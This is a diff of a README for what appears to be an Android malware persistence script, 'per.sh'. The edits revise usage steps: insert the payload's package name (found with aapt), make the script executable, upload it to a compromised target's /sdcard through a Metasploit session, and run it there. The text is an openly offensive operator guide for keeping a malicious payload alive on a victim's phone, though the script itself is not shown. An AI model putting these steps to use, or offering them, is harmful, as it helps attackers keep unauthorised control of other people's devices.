bad-boy2py/Andoird_Persistance/README.md

 cd Andoird_Persistance
 ```
 ## Usage
-1. change 'PayloadPackgeName' with your payload package name in per.sh file
+1. change 'PayloadPackgeName' in per.sh file with your payload package name
+1. to get your payload package name use aapt install it by `sudo apt install aapt -y`
+1. to extract package name by aapt use command:
+2. `aapt dump badging YourApkPath | grep package:\ name`  change YourApkPath with path for your apk file

-2. make per.sh excutable by :
+3. make per.sh excutable by :
 `sudo chmod +x per.sh`
-3. upload per.sh after make it excutable to target storage, for exmple in metasploit:
+4. upload per.sh after make it excutable to target storage, for exmple in metasploit:
 `upload per.sh /sdcard`
-4. after upload file run it by : `sh per.sh`
+5. after upload file run it by : `sh per.sh`